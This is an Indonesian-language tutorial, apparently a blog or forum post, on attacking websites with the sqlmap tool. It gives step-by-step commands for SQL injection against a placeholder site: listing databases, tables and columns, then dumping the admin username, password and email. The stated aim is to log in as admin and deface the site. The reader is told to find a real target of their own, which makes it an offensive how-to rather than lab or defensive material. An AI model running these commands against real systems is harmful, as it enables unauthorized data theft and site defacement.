sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara

otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta
memanipulasi sebuah database di dalam sebuah server.

biar lebih jelas saya akan menjelaskan sedikit tentang apa itu SQL injection dan database.

SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL
melalu URL untuk di eksekusi oleh database. bug atau vulnerability ini terjadi karena kelalian
seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya
variabel dalam web tersebut.
Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara
sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.

tools ini adalah tools yang berbasis program python, jadi untuk menjalankanya kita harus menginstall
program python. kalau kamu pengguna linux kamu tidak usah repot-repot untuk menginstall python
karena di linux sudah ada. tapi kalau kamu pengguna windows, kamu harus menginstall program python
terlebih dahulu.

kita ke step selanjutnya, saya anggap kamu sudah mempunyai target kamu sendiri, kalau belum ada
silahkan cari sendiri :-p .
disini saya umpamakan ada sebuah situs dengan domain name "https://www.target.com" . dan
mempunyai vulnerability pada tag "index.php?id=7" dengan methode get. langsung saja kita kembali ke
terminal ata cmd tadi dan ketikkan lagi

linux :
user@linux:/Desktop/sqlmap# ./sqlmap.py -u https://www.target.com/index.php?id=7 --dbs
windows :

C:\Documents and Settings\user\desktop\sqlmap>sqlmap.py -u

https://www.target.com/index.php?id=7 --dbs
perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah
sqlmap akan berusaha mencari database dari web target kita tadi.

nah sekarang kita tunggu beberapa saat dan biarkan sqlmap bekerja sampai sqlmap menemukan
database dari target kita. setelah bebearap saat sqlmap telah berhasil menemukan nama database dari
target kita. asiikk !!!

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu

information_schema
my_db
langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut,
tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama
"my_db".!! loh kenapa ? mungkin feeling aja :-p

sekarang kita ketikkan lagi perintah ini

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables

karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh
saja, bagi pengguna linux harus diawali dengan tanda "./" sebelum comand sedangkan di windows tidak
di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."
ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam
database "my_db". saya umpamakan table-table tersebut adalah sebagai berikut.

admin
members
item
nah karena saya ingin melakukan deface, maka saya akan membuka isi dari table admin tersebut.
langsung aja kita ketikkan di terminal atau CMD perintah ini

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin --columns

lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya
umpamakan nama columnya

ID
username
password
email_address
country
disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah
"username","password",dan "email_address". maka saya akan kembali mengetikkan perintah

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C

username,password,email_address --dump
dan hasilnya saya mendapati sebagai berikut :

admin:123456:admin@target.com
ini artinya :

admin = username
123456 = password
admin@target.com = email_address
nah sekarang saya tinggal mencari admin login dan siap melakukan deface . :-)

sekian dulu tutorial dari saya, kalau ada kekurangan saya minta maaf karena saya ini hanyalah seorang
newbie yang ingin berbagi sedikit ilmu.